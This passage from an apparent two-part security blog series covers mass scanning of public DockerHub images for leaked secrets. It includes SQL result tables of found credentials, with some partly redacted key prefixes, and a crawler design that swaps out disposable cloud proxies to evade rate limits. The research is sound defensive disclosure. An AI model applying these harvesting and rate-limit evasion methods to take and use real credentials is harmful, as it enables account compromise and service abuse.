| /usr/lib/python2.7/site-packages/bzrlib/tests/stub_sftp.pyc                               |                         23 |
| /usr/lib64/python2.7/site-packages/bzrlib/tests/stub_sftp.pyc                             |                         23 |
| /usr/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                            |                          6 |
| /usr/share/doc/python-twisted-conch/howto/conch_client.html                               |                          6 |
| /usr/local/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                      |                          6 |
| /usr/local/lib/python2.7/dist-packages/twisted/conch/test/keydata.py                      |                          6 |
| /usr/local/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.pyc                      |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/test/keydata.py                            |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.pyc                            |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.py                             |                          6 |
| /root/.local/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                    |                          6 |
| /usr/local/lib/node_modules/piriku/node_modules/ssh2/test/fixtures/ssh_host_rsa_key       |                          4 |
| /usr/local/lib/node_modules/strongloop/node_modules/ssh2/test/fixtures/ssh_host_rsa_key   |                          4 |
| /app/code/env/lib/python3.8/site-packages/synapse/util/__pycache__/manhole.cpython-38.pyc |                          2 |
| /app/code/env/lib/python3.8/site-packages/synapse/util/manhole.py                         |                          2 |
| /tmp/mtgolang/src/github.com/mtgolang/ssh2docker/cmd/ssh2docker/main.go                   |                          1 |
+-------------------------------------------------------------------------------------------+----------------------------+

It seems that a large number of hosts are using example keys as shipped with various Python packages. This is an interesting finding in itself, and something we may examine in a later blog post.

We can also see the host key for a Tomcat installation being used on 82 individual Docker images - that's more like what we expected to see. This verifies that these keys are sensitive, and "double-confirms", as we say here in Singapore, that they should not be disclosed.

Social Media

Social media keys were also present in the dump. Let's take a look:

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Twilio API Key                   |      220 |                       3 |
| Facebook                         |       27 |                      12 |
| LinkedIn Client ID               |       18 |                       6 |
| LinkedIn Client secret           |       16 |                       6 |
| Twitter API Key                  |        9 |                       6 |
| Twitter API Secret               |        7 |                       5 |
| Flickr Access Token              |        3 |                       2 |
| Twitter Access Secret            |        1 |                       1 |
+----------------------------------+----------+-------------------------+

Of the 27 Facebook keys, one appears to be invalid, consisting of all zeros. There are 11 unique keys which appear valid.

One of the Flickr access tokens is located in a file named /workspace/config.yml. This file contains (in addition to the detected Flickr token) what appear to be valid credentials to Amazon AWS, Instagram, Google Cloud Vision, and others.

Likewise, while examining the detections for Twitter secrets, we find only a few keys, but the files containing these keys also include AWS tokens, SendGrid API keys, Slack tokens, Salesforce tokens, and others.

mysql> select distinct(filename), count(*) from gitleaksArtifacts \
	where description like 'Twitter%' \
    group by filename \
    order by count(*) desc;
+---------------------+----------+
| filename            | count(*) |
+---------------------+----------+
| .env.example        |        6 |
| settings.py         |        3 |
| GenericFunctions.js |        2 |
| DVSA-template.yaml  |        2 |
| development.env     |        2 |
| twitter.md          |        2 |
+---------------------+----------+

It is very clear that keys and tokens often 'cluster' together in the same file.

Stripe Payment Processor Keys

The payment processor 'Stripe' has a lot of structure in its tokens, and so finding them is particularly easy. Our mutated engine located 88 unique secrets:

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Stripe                           |     1563 |                      88 |
+----------------------------------+----------+-------------------------+

Here are the first three of them, showing just how much structure is present.

mysql> select concat(path, '/', filename), 				\
	gitleaksArtifacts.secret from gitleaks_result 		\
    join gitleaksArtifacts on 							\
    gitleaksArtifacts.fileid = gitleaks_result.fileid 	\
    where 												\
    gitleaks_result.description = 'Stripe' 				\
    and isWellKnown = 0									\
    order by gitleaksArtifacts.hash						\
    limit 3;
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
| concat(path, '/', filename)                 | secret                                                                                                      |
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
| /app/code/packages/server/stripeConfig.json | pk_live_51IvkOPLx4fyREDACTEDREDACTED                                                                    |
| /app/code/packages/server/stripeConfig.json | pk_test_51IvkOPLx4fybOTqJetV23Y5S9REDACTEDREDACTED |
| /app/code/packages/server/stripeConfig.json | pk_test_51IvkOPLx4fybOTqJetV2REDACTEDREDACTED                                                                    |
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
3 rows in set (0.56 sec)

Note the leading pk_ or sk_, identifying a 'public key' (which is not sensitive) or a 'secret key', which is sensitive. Our dataset contains 47 unique pk_ keys and 41 unique sk_ keys.

Of the 88 unique credentials we see, 35 appeared to be the secret key corresponding to test credentials (starting with the string sk_test), and six appeared to be 'live', starting with the string sk_live. Ouch!
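That prefix structure makes triage trivial; a small sketch of classifying detections by Stripe's documented sk_/pk_ and _live_/_test_ markers (the key bodies below are made up for illustration):

```python
# Stripe keys encode both their role (secret vs publishable) and their mode
# (live vs test) directly in the prefix, so detections can be sorted by
# severity without ever calling the API.
def classify_stripe_key(key):
    kind = "secret" if key.startswith("sk_") else "publishable"
    mode = "live" if "_live_" in key else "test"
    return kind, mode

# Hypothetical, non-functional example values.
print(classify_stripe_key("sk_live_AAAA"))  # ('secret', 'live')   <- escalate!
print(classify_stripe_key("pk_test_BBBB"))  # ('publishable', 'test')
```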

Google Cloud Platform (GCP) Keys

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| GCP API key                      |      411 |                      89 |
+----------------------------------+----------+-------------------------+

While we found a large number of keys for the Google Cloud Platform, it should be noted that it is difficult to ascertain the level of permission available to the keys. We estimate that a portion of these keys are intended for wide-scale public deployment; for example, those for crash-reporting, which are configured to allow anonymous uploads but little else.

Amazon Web Services (AWS) Keys

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| AWS                              |   139362 |                   42095 |
+----------------------------------+----------+-------------------------+

Again, it is difficult to ascertain the privileges associated with these forty-two thousand unique keys, and thus whether they are truly sensitive.

Examining them individually does yield some context that helps, although it is not practical to do this at scale.

One thing that may interest readers is the location in which these keys were found. Three were located in the .bash_history file belonging to the superuser, indicating that these files had been improperly cleaned. Eleven other keys were found in improperly sanitized log files, and two in backups of MySQL database content.
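Access key IDs are one of the easier shapes to spot in history and log files; a short sketch of the kind of matching involved, using AWS's documented example key (the regex is our own simplification, not Gitleaks' exact rule):

```python
import re

# AWS access key IDs have a recognisable shape: a four-character prefix
# such as AKIA (long-term) or ASIA (temporary) followed by 16 upper-case
# alphanumerics.
AWS_KEY_ID = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")

def find_key_ids(text):
    return [m.group(0) for m in AWS_KEY_ID.finditer(text)]

# AWS's documented example key, as it might appear in a .bash_history file.
history = "aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE\n"
print(find_key_ids(history))  # ['AKIAIOSFODNN7EXAMPLE']
```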

Database Dumps

One of the custom detections we added to our mutated engine was to detect dumps of database information produced by the mysqldump tool. We applied this filter only to a quarter of the dataset, and found a large number of these files - almost 400.

While some of them were installation templates, there were also some which contained live data:

mysql> select \
	distinct(concat(artifact_path.path, '/', artifacts.filename)), 	\
    artifacts.filesize \
    from gitleaksArtifacts \
    join artifacts on artifacts.id = gitleaksArtifacts.fileid \
    join artifact_path on artifact_path.id = artifacts.pathid \
    where description = 'Possible database dump' \
    order by filesize desc \
    limit 25;
+---------------------------------------------------------------------------------+----------+
| (concat(artifact_path.path, '/', artifacts.filename))                           | filesize |
+---------------------------------------------------------------------------------+----------+
| /docker-entrypoint-initdb.d/zmagento.sql                                        | 72135471 |
| /docker-entrypoint-initdb.d/bitnami_mediawiki.sql                               | 10913302 |
| /app/wordpess.sql.bk                                                            |  5321931 |
| /var/www/html/sql/stackmagento.sql                                              |  5224835 |
| /var/www/html/sql/stackmagento.sql                                              |  4379391 |
| //ogAdmBd.sql                                                                   |  1046438 |
| //all-db.ql                                                                     |   918670 |
| /var/www/html/backup.sql                                                        |   703961 |
| /tmp/db.sql                                                                     |   683875 |
| /var/www/html/cphalcon/tests/_data/schemas/mysql/mysql.dump.sql                 |   603179 |
| /opt/cphalcon-3.1.x/tests/_data/schemas/mysql/mysql.dump.sql                    |   603179 |
| /cphalcon/unit-tests/schemas/mysql/phalcon_test.sql                             |   597577 |
| /usr/local/src/cphalcon/unit-tests/schemas/mysql/phalcon_test.sql               |   597577 |
| /usr/local/src/cphalcon/unit-tests/schemas/mysql/phalcon_test.sql               |   596903 |
| //allykeys.sql                                                                  |   423963 |
| /ECommerce-Java/zips.sql                                                        |   399288 |
| /app/code/database/setup.sql                                                    |   379063 |
| //dump.sql                                                                      |   366901 |
| /tmp/hhvm/third-party/webscalesqlclient/mysql-5.6/mysql-test/r/mysqldump.result |   285948 |
| /home/pubsrv/mysql/mysql-test/r/mysqldump.result                                |   229737 |
| /usr/share/mysql-test/r/mysqldump.result                                        |   223161 |
| /usr/share/zoneminder/db/zm_create.sql                                          |   218651 |
| /home/SOC-Fall-2015/ApacheCMDA-Backend/DBDump/Dump20150414.sql                  |   191648 |
| /home/apache/ApacheCMDA/ApacheCMDA-Backend/DBDump/Dump20150414.sql              |   191648 |
| /opt/mysql-backup/tmp/ubuntu-backup-2016-09-30-08-13-34.sql                     |   106985 |
+---------------------------------------------------------------------------------+----------+
25 rows in set (2.29 sec)

Browsing some of these files, we spotted credentials for a variety of CMSs, and more.
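For the curious, the shape of that custom detection is straightforward; a minimal sketch of the marker matching (the real rule lives in our modified Gitleaks configuration - the markers below are our assumption about mysqldump's header and footer comments):

```python
# mysqldump output carries distinctive comment lines at the top and bottom
# of the file, which makes a cheap first-pass detection possible before any
# deeper inspection of the contents.
DUMP_MARKERS = ("-- MySQL dump", "-- Dump completed on")

def looks_like_mysqldump(first_chunk):
    return any(marker in first_chunk for marker in DUMP_MARKERS)

sample = "-- MySQL dump 10.13  Distrib 5.7.33\n-- Host: localhost\n"
print(looks_like_mysqldump(sample))  # True
```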

And then just.. others..

Our mutated engine matched a large number of other keys and, in general, bad things(tm).

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Generic API Key                  |   941621 |                   94533 |
| Database connection string       |    32257 |                    3797 |
| JSON Web Token                   |     1817 |                     154 |
| Etsy Access Token                |      506 |                      12 |
| Linear Client Secret             |      386 |                      12 |
| Slack Webhook                    |      231 |                      32 |
| Slack token                      |      120 |                      22 |
| EasyPost test API token          |       95 |                      28 |
| EasyPost API token               |       83 |                      28 |
| Bitbucket Client ID              |       27 |                       3 |
| GitHub Personal Access Token     |       16 |                       2 |
| Airtable API Key                 |       16 |                       5 |
| Dropbox API secret               |       13 |                       7 |
| Plaid Secret key                 |       12 |                       2 |
| SendGrid API token               |       12 |                       7 |
| Sentry Access Token              |       12 |                       6 |
| GitHub App Token                 |       12 |                       1 |
| Algolia API Key                  |       11 |                       4 |
| Alibaba AccessKey ID             |        7 |                       3 |
| Plaid Client ID                  |        6 |                       1 |
| HubSpot API Token                |        6 |                       4 |
| Heroku API Key                   |        6 |                       1 |
| GitLab Personal Access Token     |        6 |                       3 |
| Mailgun private API token        |        4 |                       4 |
| SumoLogic Access ID              |        4 |                       2 |
| Lob API Key                      |        3 |                       1 |
| Atlassian API token              |        3 |                       1 |
| Mailgun webhook signing key      |        2 |                       1 |
| Grafana service account token    |        2 |                       1 |
| Asana Client Secret              |        2 |                       2 |
| Grafana api key                  |        1 |                       1 |
| Dynatrace API token              |        1 |                       1 |
+----------------------------------+----------+-------------------------+

Of most interest is the 'Generic API Key' rule. It is especially prone to false positives, but due to its wide scope, it is able to detect secrets that other detection rules miss - we found it located secrets in .bash_history files and web access logs, to name a couple. It also found the following credit card information, which was thankfully non-sensitive, since it had been sanitised:

[2016-05-02 18:43:07] main.DEBUG: TODOPAGO - MODEL PAYMENT - Response: {"StatusCode":-1,"StatusMessage":"APROBADA","AuthorizationKey":"<watchtowr redacted>","EncodingMethod":"XML","Payload":{"Answer":{"DATETIME":"2016-05-02T15:43:01Z","CURRENCYNAME":"Peso Argentino","PAYMENTMETHODNAME":"VISA","TICKETNUMBER":"12","AUTHORIZATIONCODE":"REDACTED","CARDNUMBERVISIBLE":"45079900XXREDACTED","BARCODE":"","OPERATIONID":"000000001","COUPONEXPDATE":"","COUPONSECEXPDATE":"","COUPONSUBSCRIBER":"","BARCODETYPE":"","ASSOCIATEDDOCUMENTATION":""},"Request":{"MERCHANT":"2658","OPERATIONID":"000000001","AMOUNT":"50.00","CURRENCYCODE":"32","AMOUNTBUYER":"50.00","BANKID":"11","PROMOTIONID":"2706"}}} {"is_exception":false} []

Other files were found via inventive filename searches; a search for wallet.dat yields six files, for example.

At this point, it seems our discoveries are limited only by our imagination.

File Metadata

In addition to logging the contents and name of files, we also log the UNIX permission bits. This allows us to query for unusual or (deliberately?) weak configurations. The following query lists every distinct root-owned SUID filename found across all images, yielding 325 results:

mysql> select distinct(filename) 	\
	from artifacts 					\
    where ownerUID = 0 				\
    and perm_suid = '1' 			\
    order by filename;

The results are interesting, including a number of classic 90's-era security blunders. For example, some containers ship with world-writable SUID-root files (426 files in total):

mysql> select concat(path, '/', filename), hash 					\
		from artifacts												\
		join artifact_path on artifact_path.id = artifacts.pathid	\
		join artifactHashes on artifactHashes.id = artifacts.hashid	\
		where perm_suid = '1'										\
		and perm_world_w = '1'										\
		order by filename

Also present are various SUID-root shell scripts, which are notoriously difficult to secure:

mysql> select path,filename,hash 									\
	from artifacts 													\
    join artifact_path on artifact_path.id = artifacts.pathid 		\
    join artifactHashes on artifactHashes.id = artifacts.hashID		\
    where perm_suid = '1' 											\
    and perm_world_w = 1  											\
    and filename like '%.sh'										\
    limit 10;
+-----------------------------+----------------+------------------------------------------+
| path                        | filename       | hash                                     |
+-----------------------------+----------------+------------------------------------------+
| /opt/appdynamics-sdk-native | env.sh         | fcd22cc86a46406ead333b1e92937f02c262406a |
| /opt/appdynamics-sdk-native | install.sh     | 03f39f84664a22413b1a95cb1752e184539187cb |
| /opt/appdynamics-sdk-native | runSDKProxy.sh | fb37a2ef8b28dbb20b9265fe503c5e966e2c5544 |
| /opt/appdynamics-sdk-native | startup.sh     | 90db0cac34b1a9c74cf7e402ae3da1d69975f87d |
+-----------------------------+----------------+------------------------------------------+
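The permission bits driving these queries are captured at ingest time, as each layer's tar file is iterated; a sketch using Python's tarfile module (the record fields mirror the column names above, but the helper itself is illustrative):

```python
import io
import stat
import tarfile

# Walk a decompressed layer tar and emit one metadata record per entry.
# The mode bits on each TarInfo carry the SUID and world-writable flags
# we later query for.
def artifact_metadata(layer_tar_bytes):
    records = []
    with tarfile.open(fileobj=io.BytesIO(layer_tar_bytes)) as tar:
        for member in tar:
            records.append({
                "filename": member.name,
                "ownerUID": member.uid,
                "perm_suid": bool(member.mode & stat.S_ISUID),
                "perm_world_w": bool(member.mode & stat.S_IWOTH),
            })
    return records
```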

Conclusions

I hope you've enjoyed this blog series! We had a lot of fun building the infrastructure, finding credentials to some incredibly scary things, and of course documenting our journey.

The main point we intend to illustrate is that it is very easy for an otherwise well-funded, careful organisation to leak secrets via DockerHub. These are not personal containers with little value, but those operated by large organisations who are, for the most part, proactive in securing their information.

But this is a great example of today's shifting attack surface. Securing a modern organisation requires examination of a wide and varied estate, and organisations must proactively consider what their attack surface may have truly evolved into.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

Learning To Crawl (For DockerHub Enthusiasts, Not Toddlers) - Docker Container Images (3/4)

15 February 2023 at 13:25

This post is the third part of a series on our recent adventures into DockerHub. Before you read it, you are advised to look at the other parts of this series:

-

Those who have been following this series on our processing of DockerHub will be all ready for this, the third post, focused on system design. If you're a relative newcomer, though, or haven't been following the series, don't worry - we've got you covered with a quick recap!

As I stated in the previous post, we have a very simple mission here at watchTowr - to help our clients understand how they could be compromised today. After noting how frequently we discover potential compromises due to secrets lurking inside publicly-available Docker images, we decided to carry out a more thorough study to assess the scale of this kind of credential leakage.

We love doing things "at scale" here at watchTowr, and so we didn't just docker pull a few images and grep -ir password . - we did things at a much larger scale, meaning we can make statistically meaningful generalisations from our results. In this post, we're going to share the overall 'system design' that we used to acquire, process, and examine files, ultimately finding oodles of secrets - passwords, certificates, and everything in between.

General Design

As I alluded to above, it is our intention to fetch a statistically significant portion of the DockerHub dataset. To do this, a single computer isn't going to be enough - we are going to need multiple "fetch-worker" nodes. We used Amazon's EC2 service for this, to allow for easier scaling.

Our approach is to use a MySQL database for storing file metadata (such as filesystem path, filename, size, and a sha256 hash of the contents). The files themselves, once extracted from a Docker filesystem, are stored in a flat filesystem directory. We chose to use AWS' 'Elastic File System' for this, which is based on NFS. Note that we don't store the Docker image files themselves - we download them, extract the files they contain, and discard them.
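One workable layout for the 'flat' store (an assumption on our part - the post only specifies a flat directory plus a sha256 hash in MySQL) is to name each stored file after its content hash, so identical files shared across layers and images are stored exactly once:

```python
import hashlib
import pathlib
import shutil
import tempfile

# Store an extracted file under its sha256 digest. If another layer already
# contributed an identical file, the copy is skipped; the MySQL metadata
# rows still record every path it appeared at.
def store_artifact(src_path, store_root):
    digest = hashlib.sha256(pathlib.Path(src_path).read_bytes()).hexdigest()
    dest = pathlib.Path(store_root) / digest
    if not dest.exists():
        shutil.copyfile(src_path, dest)
    return digest

# Demo against a throwaway directory.
store = tempfile.mkdtemp()
src = pathlib.Path(store) / "src.bin"
src.write_bytes(b"-----BEGIN RSA PRIVATE KEY-----")
digest = store_artifact(src, store)
print(digest[:12])
```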

Once files - referred to as 'artifacts' going forward - have their metadata and contents ingested into the system, separate instances (which we termed "scan-workers") search them for interesting information, such as keys and access tokens, via a slightly-modified version of the popular GitLeaks software. We'll go into more detail on the "scan" side of the system in a subsequent blog post.

Finally, we use the Zabbix monitoring software to graph metrics, and (combined with the excellent py-spy tool) monitor and troubleshoot performance issues.

Zabbix helps us spot misbehaving nodes and odd circumstances

Problem 1: Finding Repositories

One aspect of the project we expected to be very simple is the mere act of locating repository names in order to fetch them. Taking a look at the DockerHub search page, we can see a number of web services which speak json, and so we scurried away to write tools to consume this data.

Great, a webservice! Let's leech from it!

However, our triumph was short-lived, since this service only returned the first 2,500 search results, yielding only an HTTP 400 response for anything beyond this range. While there are some ways to work around this - applying search filters, or a dictionary attack on search keywords - there is actually a much better way.

Regular readers of the blog will remember a previous post in which we sing the praises of the Common Crawl dataset. The dataset, which is essentially an open-source crawl of the web, can come to our rescue here. Rather than attempt to spider the DockerHub pages ourselves, why not query the Common Crawl for all pages in the hub.docker.com domain? While there'll be a lot of false positives, they're easily discarded, and the result will be a lot of URLs containing information about repositories or usernames (from which it is easy to fetch a list of owned repositories).

We'll do this in Athena:

select count(*) 
FROM "ccindex"."ccindex"
WHERE crawl like 'CC-MAIN-2022-33'
and url_host_name = 'hub.docker.com'
Pretty simple, huh?

This simple query yields slightly over 274,000 results. While not all of these are useful to us, the majority are, yielding information about over 20,000 individual repositories.

Repositories galore!
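The crawled URL list still needs reducing to repository names; a minimal sketch of that filtering (the /_/<name> and /r/<owner>/<name> path conventions are our reading of DockerHub's URL scheme, and the helper is illustrative):

```python
from urllib.parse import urlparse

# Official images live under /_/<name>, user repositories under
# /r/<owner>/<name>; anything else (search pages, profiles, and other
# false positives from the crawl) is discarded.
def repo_from_url(url):
    parts = urlparse(url).path.strip("/").split("/")
    if len(parts) >= 2 and parts[0] == "r":
        return f"{parts[1]}/{parts[2]}" if len(parts) >= 3 else None
    if len(parts) >= 2 and parts[0] == "_":
        return f"library/{parts[1]}"
    return None

print(repo_from_url("https://hub.docker.com/r/bitnami/mediawiki"))  # bitnami/mediawiki
print(repo_from_url("https://hub.docker.com/_/ubuntu"))             # library/ubuntu
print(repo_from_url("https://hub.docker.com/search?q=x"))           # None
```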

Fantastic! Now we're ready to spider. Right? Well, almost.

Problem 2: Rate Limiting

Unfortunately for us, the DockerHub API will aggressively rate-limit our requests, responding with an HTTP 429 once we exceed some invisible quota. Our first instinct was to register and pay for this service, but bulk access to this API is not something DockerHub offers, and so we must turn to more inventive methods.

While we initially ran a number of SOCKS proxy servers, we found they became rate-limited very quickly, and so we designed a system whereby each proxy (an EC2 'mini' instance) is used only until rate-limiting begins. As soon as we see an HTTP 429, we destroy the proxy instance and build a fresh one.
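The rotation logic itself is tiny; a sketch of the rotate-on-429 loop, with the HTTP client and EC2 automation stubbed out as injectable callables (all names here are ours, not the real implementation):

```python
# Funnel requests through the current proxy until DockerHub starts
# rate-limiting; a 429 means the egress IP is burned, so the instance is
# destroyed and replaced before retrying.
def fetch_with_rotation(url, proxy, http_get, provision_proxy, destroy_proxy):
    while True:
        status, body = http_get(url, proxy)
        if status != 429:
            return status, body, proxy
        destroy_proxy(proxy)       # this egress IP is burned
        proxy = provision_proxy()  # replace it and retry

# Simulated run: the first proxy is rate-limited, the second succeeds.
responses = {"proxy-1": (429, b""), "proxy-2": (200, b"{}")}
status, body, proxy = fetch_with_rotation(
    "https://hub.docker.com/v2/repositories/library/ubuntu/tags",
    "proxy-1",
    http_get=lambda url, p: responses[p],
    provision_proxy=lambda: "proxy-2",
    destroy_proxy=lambda p: None,
)
print(status, proxy)  # 200 proxy-2
```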

Finally, we're ready to spider.

Iterating And Claiming Layer(z)

Owing to the knowledge of Docker layers we built up in the previous post, we can fetch in a fairly intelligent manner. First, each "fetch-worker" will iterate the list of valid repositories, and find the most recently-pushed tag for each. This is a design decision intended to keep the dataset representative of the wider DockerHub contents; while it means we may miss secrets only stored in certain tags, it has the advantage that we don't discover revoked secrets in obsolete repository versions.

For each tag, we'll then enumerate layers, inserting them into the database.

Once this is complete, we can begin to fetch the layers themselves. We must be mindful not to duplicate work, and to this end, a fetch-worker node will first 'claim' each layer by adding it to the docker_layers_in_progress table on the centralised database, which uses a unique key to ensure that each layer can only be allocated to a single node. This approach (while slightly inefficient) allows us to rapidly scale worker nodes.
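The claiming trick hinges entirely on the database's unique-key constraint. Here's an illustrative sketch, with sqlite3 standing in for the central MySQL instance, and illustrative column names:

```python
import sqlite3

# Sketch of the layer-claiming scheme; sqlite3 stands in for the central
# MySQL database, and the table/column names are illustrative.
db = sqlite3.connect(":memory:")
db.execute("""CREATE TABLE docker_layers_in_progress (
    layer_digest TEXT PRIMARY KEY,   -- unique key: one claimant per layer
    worker_id    TEXT NOT NULL
)""")

def claim_layer(digest, worker_id):
    """Return True if this worker won the claim, False if another node did."""
    try:
        db.execute("INSERT INTO docker_layers_in_progress VALUES (?, ?)",
                   (digest, worker_id))
        db.commit()
        return True
    except sqlite3.IntegrityError:
        return False
```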

Once a node has claimed a layer, it can simply fetch it via HTTP. If the layer is very large, it will be saved to disk, otherwise, the layer will be held in memory. Either way, the data is decompressed, and the resulting tar file iterated. Each entry in the tar file results in at least one insertion into the database. For regular files, the file is also copied to the 'flat' store, an NFS-mounted file share.
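A minimal sketch of that per-layer ingestion step might look like the following, with record_entry as a hypothetical stand-in for the real database insertion and flat-store copy:

```python
import gzip
import io
import tarfile

# Sketch of per-layer ingestion: decompress the fetched blob, walk the tar,
# and hand each entry to a (hypothetical) record_entry callback. The real
# system also spills large layers to disk; this keeps everything in memory.
def ingest_layer(gz_bytes, record_entry):
    data = gzip.decompress(gz_bytes)
    count = 0
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for member in tar:
            # Only regular files have contents worth scanning for secrets.
            contents = tar.extractfile(member).read() if member.isreg() else None
            record_entry(member.name, member.size, contents)
            count += 1
    return count
```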

Pulling An Image

Our first step is to list the tags present for a given repository image (identified by owner and name). This is easily done by requesting an endpoint from the v2 API anonymously, with a simple GET.

curl  "https://hub.docker.com/v2/repositories/library/ubuntu/tags"

The results are plentiful.

 {
  "count": 517,
  "next": "https://hub.docker.com/v2/repositories/library/ubuntu/tags?page=2",
  "previous": null,
  "results": [
    {
      "creator": 7,
      "id": 2343,
      "images": [
        {
          "architecture": "amd64",
          "features": "",
          "variant": null,
          "digest": "sha256:2d7ecc9c5e08953d586a6e50c29b91479a48f69ac1ba1f9dc0420d18a728dfc5",
          "os": "linux",
          "os_features": "",
          "os_version": null,
          "size": 30426706,
          "status": "active",
          "last_pulled": "2022-09-24T12:06:27.353126Z",
          "last_pushed": "2022-09-02T00:04:28.778974Z"
        },
   <snip>

As you can see, all the fields we need are here - the architecture and the OS, which we filter on, and the date the tag was last pushed. Great.
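A sketch of the "most recently pushed tag" selection, assuming the JSON shape shown above (each entry in results carries a name plus images[].last_pushed; the ISO-8601 timestamps conveniently compare correctly as plain strings):

```python
# Sketch of picking the most recently pushed tag from the /tags endpoint's
# results array, filtered to one OS/architecture. Field names assume the
# response shape shown above; the "name" field per tag is an assumption
# based on the live API rather than the snippet.
def newest_tag(tag_results, os_name="linux", arch="amd64"):
    best_name, best_pushed = None, None
    for tag in tag_results:
        for image in tag.get("images", []):
            if image.get("os") != os_name or image.get("architecture") != arch:
                continue
            pushed = image.get("last_pushed")
            # ISO-8601 timestamps of identical format sort lexicographically.
            if pushed and (best_pushed is None or pushed > best_pushed):
                best_name, best_pushed = tag["name"], pushed
    return best_name
```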

The next step is to identify the layers involved, and fetch them. This we dealt with in a previous post, so I won't go into detail, but suffice it to say we must authenticate (anonymously) and then fetch the tag's manifest, which contains the hashes of the constituent layers. I'll show examples using curl, for ease of demonstration, but the actual code to do this is Python.

$ curl  "https://auth.docker.io/token?service=registry.docker.io&scope=repository:library/ubuntu:pull"
{"token":"eyJhbGci<snip>gDHzIqA","access_token":"eyJhbGci<snip>gDHzIqA","expires_in":300,"issued_at":"2022-09-22T14:08:55.923752639Z"}

$ curl --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" "https://registry-1.docker.io/v2/library/ubuntu/manifests/xenial"

Our result looks something akin to this:

{
   "schemaVersion": 1,
   "name": "library/ubuntu",
   "tag": "xenial",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e"
      },
      {
         "blobSum": "sha256:da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1"
      },
      {
         "blobSum": "sha256:b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01"
      },
      {
         "blobSum": "sha256:58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50"
      }
   ]
   <snip>
}

Finally, we can fetch the resources by their hash.

$ curl --location --header "Authorization: Bearer eyJhbGci<snip>gDHzIqA" https://registry-1.docker.io/v2/library/ubuntu/blobs/sha256:fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e

It's worth noting at this point that there appears to be more than one version of this schema in active use - do check the schemaVersion tag and handle all versions!
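A minimal dispatch on schemaVersion might look like this - the field names follow the v1 (fsLayers/blobSum) and v2 (layers/digest) manifest formats, but treat it as a starting point rather than an exhaustive parser:

```python
# Sketch of schemaVersion handling. v1 manifests list layers under fsLayers,
# v2 manifests under layers; anything else is flagged loudly rather than
# silently skipped.
def layer_digests(manifest):
    version = manifest.get("schemaVersion")
    if version == 1:
        return [fl["blobSum"] for fl in manifest["fsLayers"]]
    if version == 2:
        return [layer["digest"] for layer in manifest["layers"]]
    raise ValueError(f"unhandled schemaVersion: {version!r}")
```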

I was also somewhat surprised to find that fetching certain layers from DockerHub will yield a corrupted archive, even when pulled using the official Docker client. I was under the impression that DockerHub used fancy locking semantics to ensure atomicity, but perhaps certain repositories were uploaded before this feature was rolled out. Also of note is the presence of zero-byte layers, which we must handle.

With this architecture, however, we are able to ingest a large amount of data and scale efficiently. We've solved the problems that stood in our way, and we're now ready to analyse all that data, which is the topic of the next post in the series!

Performance

While we deliberately chose not to spend a large amount of time optimising performance, we can share some interesting datapoints.

The database (MySQL on a t2.2xlarge instance) performed adequately, although our technique for allocating scan nodes added a lot of latency; we'd suggest that any follow-up research replace it with some kind of scalable queuing system. While we won't go into detail on the topic of MySQL, as database tuning is an art in itself, we will share the database's final size - around 200GB (including performance and statistical data logged by Zabbix).

One major bottleneck was the 'flat' data storage shared between nodes. Early on, we made the design decision to store files in a 'flat' structure, with each simply named according to its hash. While typical filesystems scale badly beyond around a million files, our past experience with large (single-digit millions) filesets in this kind of structure has been adequate, showing that everything but listing the directory contents (which we do not need to do) is performant, given reasonable hardware and an ext4 filesystem.

Initially, we tried to use S3 for storage of objects, but found that the overhead of a full HTTP API call for each file we examine was significant, and so we moved to Amazon's Elastic File System.

As you can see in the below graph, most of the IO that we generated during normal ingest was in metadata - a sure sign of inefficiency.

Yowza!

At the end of the project, we also attempted to transfer the amassed files to a physical disk for long-term archival, since storing data in EFS is chargeable. However, we found that many tools which we've used previously with filesets in the single-digit millions became unusable, even when we were patient. For example, mounting the NFS volume and attempting to rsync the contents would result in hung sessions and no files transferred. Even once we had a working approach, we observed that around 60% of IOPS were for object metadata, despite the fact that we were solely fetching objects by name, and not enumerating them. Clearly, Amazon's EFS had some difficulty adapting to our unusual workload (although I hasten to add that it remained usable, a feat of engineering in itself).

These two factors combine to make it obvious that we are at (or beyond) the limits of a flat filesystem. For any who wish to extend or replicate the research, we would suggest using either a directory structure (perhaps something simple, based on the file hash) or a proper 'archival' file format such as the WARC archives that the Common Crawl project uses. This would necessitate writing some code to properly synchronise and ingest objects transferred from worker nodes.

Everyone Hates Regex

